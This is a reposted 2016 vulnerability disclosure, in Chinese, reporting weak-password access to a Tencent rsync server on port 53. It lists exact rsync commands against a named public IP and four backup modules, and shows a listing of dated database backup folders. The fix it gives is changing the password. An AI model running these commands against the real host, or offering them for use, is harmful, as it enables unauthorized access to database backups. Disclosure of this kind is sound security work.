记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

腾讯某rsync服务器存在弱口令(非常规端口)

2016-04-02 10:20

rsync 183.60.118.219::init --port 53 pwd:

rsync 183.60.118.219::dblogbak --port 53 pwd:

rsync 183.60.118.219::dbbackup --port 53 pwd:

rsync 183.60.118.219::dumpbackup --port 53 pwd:





主要的是

rsync 183.60.118.219::dbbackup --port 53 pwd:

[email protected] :~/Desktop# rsync 183.60.118.219::dbbackup/ --port 53

drwxr-xr-x 20,480 2016/03/31 08:05:02 .

drwxr-xr-x 36,864 2016/03/24 03:00:46 20160324

drwxr-xr-x 36,864 2016/03/25 03:44:08 20160325

drwxr-xr-x 36,864 2016/03/26 03:56:24 20160326

drwxr-xr-x 36,864 2016/03/27 03:57:07 20160327

drwxr-xr-x 36,864 2016/03/28 03:58:47 20160328

drwxr-xr-x 36,864 2016/03/29 03:59:39 20160329

drwxr-xr-x 36,864 2016/03/30 03:59:40 20160330

drwxr-xr-x 36,864 2016/03/31 04:00:53 20160331





1.png



我看了一下ip段似乎是腾讯qq空间应用的ip段。应该是给这些应该备份数据的,或者可能只是测试数据,并不清楚

rsync 183.60.118.219::dumpbackup --port 53 pwd:

这里也有很多自己看把,我都不知道怎么说,并不清楚是什么来的

漏洞证明:

rsync 183.60.118.219::init --port 53 pwd:

rsync 183.60.118.219::dblogbak --port 53 pwd:

rsync 183.60.118.219::dbbackup --port 53 pwd:

rsync 183.60.118.219::dumpbackup --port 53 pwd:

修复方案:

修改密码


知识来源: www.wooyun.org/bugs/wooyun-2016-0191150

阅读:84829 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯某rsync服务器存在弱口令(非常规端口)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云